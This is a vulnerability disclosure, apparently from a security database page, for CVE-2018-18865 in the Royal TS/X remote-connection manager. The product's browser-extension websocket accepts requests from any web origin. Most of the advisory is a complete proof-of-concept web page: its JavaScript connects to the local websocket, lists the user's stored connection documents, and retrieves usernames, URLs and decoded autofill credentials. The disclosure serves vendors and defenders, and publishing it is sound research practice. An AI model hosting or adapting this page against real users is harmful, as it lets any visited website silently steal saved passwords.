Royal TS/X Information Disclosure

2018.11.03
pl Jakub Palaczynski (PL) pl
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2018-18865
CWE: CWE-255


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

Title: Royal TS/X - Information Disclosure Author: Jakub Palaczynski Date: 10. July 2018 CVE: CVE-2018-18865 Affected product: ============= Royal TS/X < Royal TS v5 Beta / Royal TSX v4 Beta Vulnerability - Information Disclosure: ============================= Any third party web application can steal credentials created in Royal TS/X when browser extension is enabled. Browser extension communicates using websockets (default TCP port 54890) and websockets do not use any validation to verify origin of the request. PoC website: ========== <!DOCTYPE html> <meta charset="utf-8" /> <title>RoyalTS/X Exploit</title> <script language="javascript" type="text/javascript"> var wsUri = "ws://127.0.0.1:54890/"; var output; function init() { output = document.getElementById("output"); testWebSocket(); } function testWebSocket() { writeToScreen("Let's retrieve some data..."); websocket = new WebSocket(wsUri); websocket.onopen = function(evt) { onOpen(evt,"{\"Command\":\"GetDocuments\",\"Arguments\":null,\"PluginVersion\":\"1.0.0.0\",\"RequestId\":\"aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa\"}") }; websocket.onclose = function(evt) { onClose(evt) }; websocket.onmessage = function(evt) { onMessage(evt) }; websocket.onerror = function(evt) { onError(evt) }; } function onOpen(evt,message) { doSend(message); } function onClose(evt) { } function onMessage(evt) { var obj = JSON.parse(evt.data); if (obj['Command'] == "GetDocuments") { for (var x in obj['ResponseData']){ writeToScreen("Name: " + obj['ResponseData'][x]['Name']); writeToScreen("Unlocked: " + obj['ResponseData'][x]['Unlocked']); for (var y in obj['ResponseData'][x]['Credentials']){ writeToScreen("Username: " + obj['ResponseData'][x]['Credentials'][y]['UserName']); writeToScreen("URL: " + obj['ResponseData'][x]['Credentials'][y]['URL']); if (obj['ResponseData'][x]['Unlocked'] == true){ websocket.close(); websocket = new WebSocket(wsUri); websocket.onopen = function(evt) { onOpen(evt,"{\"Command\":\"GetLoginInformation\",\"Arguments\":{\"CredentialId\":\"" + obj['ResponseData'][x]['Credentials'][y]['ID'] + "\"},\"PluginVersion\":\"1.0.0.0\",\"RequestId\":\"aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa\"}") }; websocket.onclose = function(evt) { onClose(evt) }; websocket.onmessage = function(evt) { onMessage(evt) }; websocket.onerror = function(evt) { onError(evt) }; } } } } else { if (obj['Command'] == "GetLoginInformation") { var obj = JSON.parse(evt.data); writeToScreen("AutoFill Data: " + atob(obj['ResponseData'])); } } } function onError(evt) { writeToScreen('<span style="color: red;">ERROR:</span> ' + evt.data); } function doSend(message) { websocket.send(message); } function writeToScreen(message) { var pre = document.createElement("p"); pre.style.wordWrap = "break-word"; pre.innerHTML = message; output.appendChild(pre); } window.addEventListener("load", init, false); </script> <h2>RoyalTS/X Exploit</h2> <div id="output"></div> Contact: ======= Jakub[dot]Palaczynski[at]gmail[dot]com


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top